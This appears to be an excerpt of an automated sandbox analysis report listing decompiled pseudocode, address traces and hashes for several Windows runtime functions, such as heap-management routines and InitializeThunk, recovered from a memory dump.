Instruction Fuzzy Hash: B4210436204304AFD709DF58C890BAABBA5EFD4750F04856DF9958B381E730E909CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0461AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0461AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04617D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04617D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04617D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04617D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04677794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0461ae78
0x0461ae7c
0x0461ae7e
0x0461ae81
0x0461ae86
0x0461ae8d
0x04662691
0x0461ae93
0x0461ae93
0x0461ae93
0x0461ae98
0x0461ae9d
0x046626a2
0x046626b4
0x046626a4
0x046626ad
0x046626ad
0x046626b9
0x00000000
0x046626bb
0x00000000
0x046626bb
0x0461aea3
0x0461aea3
0x0461aea3
0x0461aeaa
0x046626c0
0x046626c9
0x046626c9
0x0461aeb3
0x046626d4
0x046626e1
0x00000000
0x00000000
0x046626e7
0x046626ee
0x046626f0
0x046626f9
0x046626f9
0x04662702
0x04662708
0x04662708
0x0466270b
0x0466270f
0x04662711
0x04662711
0x04662725
0x04662725
0x00000000
0x0461aeb9
0x0461aeb9
0x0461aebf
0x0461aebf
0x0461aeb3

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: fa65106af027d42aa3e7f524c1c29f032f319f5efa8fccd75ff522f0d67e51fa
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 0621C971B026859BEB22AB68C994B2537E8EB50344F0D00E1EC05CB3A2F778FC41D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04677794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04677794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x46e7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0463F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04617D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04639AE0();
					_t24 = L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x04677799
0x0467779a
0x0467779b
0x046777a3
0x046777ab
0x046777ae
0x046777b1
0x046777b1
0x046777bf
0x046777c4
0x046777c8
0x046777ce
0x046777d4
0x046777e0
0x046777e0
0x046777d6
0x046777d6
0x046777de
0x00000000
0x00000000
0x046777de
0x046777e5
0x046777f0
0x046777f3
0x046777f6
0x046777fd
0x04677800
0x0467780c
0x04677818
0x0467782b
0x0467781a
0x04677823
0x04677823
0x04677830
0x04677831
0x04677838
0x0467783d
0x0467783e
0x0467784f
0x0467784f
0x0467785a

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a17e2434147acb3ea36956ba3c0aa007cddbbd01c6c2c8969a03b4e51916142
Instruction ID: 1690d420055bbc7a7eb9086a09a94611570d991152090562ec33afbdf997182f
Opcode Fuzzy Hash: 7a17e2434147acb3ea36956ba3c0aa007cddbbd01c6c2c8969a03b4e51916142
Instruction Fuzzy Hash: 2021AE72A00644ABC725DF69D880EABB7B9EF48341F14056DF50AC7760E634F900CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0462FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0462FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E046076E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0462fd9b
0x0462fda0
0x0462fda1
0x0462fdab
0x0462fdad
0x0462fdb0
0x0462fdb8
0x0462fe0f
0x0462fde6
0x0462fde9
0x0462fdec
0x0466c0c0
0x0462fdfe
0x0462fe06
0x0462fe06
0x0466c0c8
0x0462fe2d
0x0462fe2d
0x00000000
0x0462fe2d
0x0466c0d1
0x0466c0e0
0x0466c0e5
0x0466c0e5
0x0466c0e8
0x00000000
0x0466c0e8
0x0462fdf4
0x00000000
0x00000000
0x0462fdf6
0x0462fdfa
0x0462fe1a
0x0462fe1f
0x0462fe1f
0x0462fdfc
0x00000000
0x0462fdfc
0x0462fdcc
0x0462fdd0
0x0462fe26
0x00000000
0x0462fe26
0x0462fdd8
0x0462fddb
0x0462fddd
0x0462fde0
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: a9ab620225022960c8139da53795521165e241eeec11eca6b2f512a0a6e8a62d
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 53219D71600A50EBD739CF09C640A66B7F5EBA4B10F24856EE88A87B10F731BC01EF80

Uniqueness

Uniqueness Score: -1.00%

Function 045F9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E045F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x46cf708);
				E0464D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E046395D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E046395D0();
				_t33 =  *0x46e84c4; // 0x0
				L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x46e84c4; // 0x0
				L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x46e84c4; // 0x0
				E04612280(L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x46e86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E046395D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E046395D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E045F9325();
					_t50 =  *0x46e84c4; // 0x0
					return E0464D0D1(L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x045f9240
0x045f9242
0x045f9247
0x045f924c
0x045f924e
0x045f9255
0x045f9257
0x045f925a
0x045f925f
0x045f925f
0x045f9266
0x045f9271
0x045f9276
0x045f9279
0x045f927e
0x045f9295
0x045f929a
0x045f92b1
0x045f92b6
0x045f92d7
0x045f92dc
0x045f92e0
0x045f92e6
0x045f92e8
0x045f92ee
0x045f9332
0x045f9333
0x045f9337
0x045f9338
0x045f933a
0x045f933a
0x045f933d
0x045f9342
0x045f9342
0x045f9345
0x045f9349
0x045f934e
0x045f9352
0x045f9357
0x045f92f4
0x045f92f4
0x045f92f6
0x045f92f9
0x045f9300
0x045f9306
0x045f9324
0x045f9324

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43d28eb51c50161b8dd003796884811d6049b0cce0b251ac38d13b3eda4c18af
Instruction ID: b2119e9211b02d77480416183fd943c36ec69119f5b024bc13c36a1084050855
Opcode Fuzzy Hash: 43d28eb51c50161b8dd003796884811d6049b0cce0b251ac38d13b3eda4c18af
Instruction Fuzzy Hash: 5821F472141A40DFD722EF68CA40F19B7F9FF08708F14456CE1499B6B2EA35B945DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0462B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0462B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04612280(_t12, 0x46e8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E046300C2(0x46e8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0462b395
0x0462b3a2
0x0462b3a5
0x0462b3aa
0x0462b3b2
0x0462b3ba
0x0462b3bd
0x0462b3c0
0x0462b3c4
0x0462b3c9
0x0466a3e9
0x0466a3ed
0x0466a3f0
0x0466a3ff
0x0466a403
0x0466a409
0x00000000
0x00000000
0x0466a40b
0x0466a40b
0x0466a40f
0x0466a415
0x0466a423
0x0466a423
0x0466a415
0x0462b3d1
0x0462b3e8
0x0462b3e8
0x0462b3d9

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94f379be5570e9b41f3c3da10dd978f6a262796fa3df9f288194e085bb4980b
Instruction ID: c06fdd7908d5297c3b8578fbce03e728aeb104142e9c561440000911bdbe9a65
Opcode Fuzzy Hash: b94f379be5570e9b41f3c3da10dd978f6a262796fa3df9f288194e085bb4980b
Instruction Fuzzy Hash: D5116B33702520ABDB29DE559E81A2B7396EBD5730B28412DDD16E7390F931BC02C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 04684257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04684257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x46d08d0);
				E0464D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E046841E8(__ebx, __edi, __ecx, _t39);
				E0460EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x46e87e4;
					_t18 =  *0x46e87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x46e5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x46e87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x46e87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L045F7055(_t31 + 0xfffffff8);
								_t24 =  *0x46e87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x46e87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x46e5cd0;
				if( *0x46e5cd0 <= 0) {
					L045F7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x46e87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x46e87e8 = _t30;
						 *0x46e87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0464D0D1(L04684320());
			}

0x04684257
0x04684257
0x04684257
0x04684259
0x0468425e
0x04684263
0x04684265
0x04684273
0x04684278
0x0468427c
0x0468427f
0x04684281
0x04684287
0x046842d7
0x046842d7
0x046842da
0x0468428d
0x0468428d
0x0468428f
0x04684292
0x04684297
0x0468429c
0x046842a0
0x046842a6
0x046842a8
0x046842ae
0x046842b3
0x00000000
0x046842ba
0x046842ba
0x046842bf
0x046842c5
0x046842ca
0x046842cf
0x046842d0
0x00000000
0x046842d0
0x046842b3
0x00000000
0x046842a6
0x0468429c
0x046842dc
0x046842dc
0x046842e3
0x04684309
0x046842e5
0x046842e5
0x046842e8
0x046842ee
0x046842f0
0x00000000
0x046842f2
0x046842f2
0x046842f4
0x046842f7
0x046842f9
0x04684300
0x04684300
0x046842f0
0x0468430e
0x0468431f

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621a7da8bfc6ed002cebc5028c5cf536a67a36a8e1439dd2e3b3330da8b47932
Instruction ID: 857efd7bae68ca08d8854506379bd64203895389b58d1edf04ab00a9120c910f
Opcode Fuzzy Hash: 621a7da8bfc6ed002cebc5028c5cf536a67a36a8e1439dd2e3b3330da8b47932
Instruction Fuzzy Hash: 91215870901606CFDB14FF66D110A58BBE1FF85318B10926EC1058F390FB39A881CF40

Uniqueness

Uniqueness Score: -1.00%

Function 046746A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E046746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0463F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0462D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L046177F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x046746b7
0x046746ba
0x046746c5
0x046746c8
0x046746d0
0x046746d4
0x046746e6
0x046746e9
0x046746f4
0x046746ff
0x04674705
0x04674706
0x0467470c
0x04674713
0x0467471b
0x04674723
0x04674725
0x046746d6
0x046746d9
0x046746db
0x046746db
0x04674732

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 235d014886c09000d1600912ee94689a51718bab5ac42a53960e3938e857f35b
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 0011E572A04208BBD7059F6CD8808BEB7B9EF95304F10806EF944C7350EA319D55D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 04622397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04622397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x46e848c != 0) {
					L0461FAD0(0x46e8610);
					if( *0x46e848c == 0) {
						E0461FA00(0x46e8610, _t19, _t27, 0x46e8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04622581(0x46e8610, 0x45d50a0, _t26, _t27, _t28);
						E0461FA00(0x46e8610, 0x45d50a0, _t27, 0x46e8610);
					}
				} else {
					L1:
					_t11 =  *0x46e8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04634886(0x45d1088, 1, 0x46e8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04622581(0x46e8610, (_t11 << 4) + 0x45d5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x046223b0
0x046223b6
0x04622409
0x04622415
0x04665ae9
0x00000000
0x0462241b
0x0462241b
0x0462241d
0x04622427
0x0462242e
0x04622430
0x04622430
0x046223b8
0x046223b8
0x046223b8
0x046223bf
0x046223fc
0x046223fc
0x046223c1
0x046223c3
0x046223d0
0x046223d8
0x046223d8
0x046223dc
0x046223de
0x046223e1
0x046223e1
0x046223ec

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98384ac1bd5b2106593e6655276cb4bcbf01be0c6e244b585434f4f4d21df862
Instruction ID: dfef95d4bd69bba31565875ebc57d5d892b9d01c0a98d9464789efa5ecbfb8ca
Opcode Fuzzy Hash: 98384ac1bd5b2106593e6655276cb4bcbf01be0c6e244b585434f4f4d21df862
Instruction Fuzzy Hash: 53116B31340B20B7F330AA2A9D50F16B3C8EF60754F08845AF506EB2A0F9B4FC419B59

Uniqueness

Uniqueness Score: -1.00%

Function 045FC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E045FC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x46ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0460EEF0(0x46e70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0467F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0460EB70(_t29, 0x46e70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0463B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0467F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x46e70c0; // 0x0
					while(_t38 != 0x46e70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x46eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x045fc96a
0x045fc974
0x045fc988
0x045fc98a
0x04667c9d
0x04667c9f
0x04667ca4
0x04667cae
0x04667cf0
0x04667cf5
0x04667cfa
0x045fc992
0x045fc996
0x045fc997
0x045fc998
0x045fc9a3
0x045fc9a3
0x04667cb0
0x04667cb7
0x04667cbb
0x00000000
0x00000000
0x04667cbd
0x04667ce8
0x04667cc5
0x04667cc8
0x04667cca
0x04667cd0
0x04667cd6
0x04667cde
0x04667ce4
0x04667ce4
0x04667cd0
0x00000000
0x04667ce8
0x045fc990
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efa3e8f2a530327539bbc7dfadc12bd4df373c6ecb720296f6d39715fe59f295
Instruction ID: c88c4868c1a4c1a5ee3001dd17127e9c094c9ac7f7871683f3a53e0bed87710d
Opcode Fuzzy Hash: efa3e8f2a530327539bbc7dfadc12bd4df373c6ecb720296f6d39715fe59f295
Instruction Fuzzy Hash: BB11CE713106469FD714AE69DC85A2B77E5FB8461AF00052CE84287651FB25FD10CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 046337F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E046337F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04612280(_t6, 0x46e8550);
				}
				_t29 = E0463387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0460FFB0(0x46e8550, _t27, 0x46e8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x046337fa
0x046337fc
0x04633805
0x04633808
0x04633808
0x04633814
0x04633818
0x04633846
0x04633848
0x0463384b
0x0463384b
0x04633852
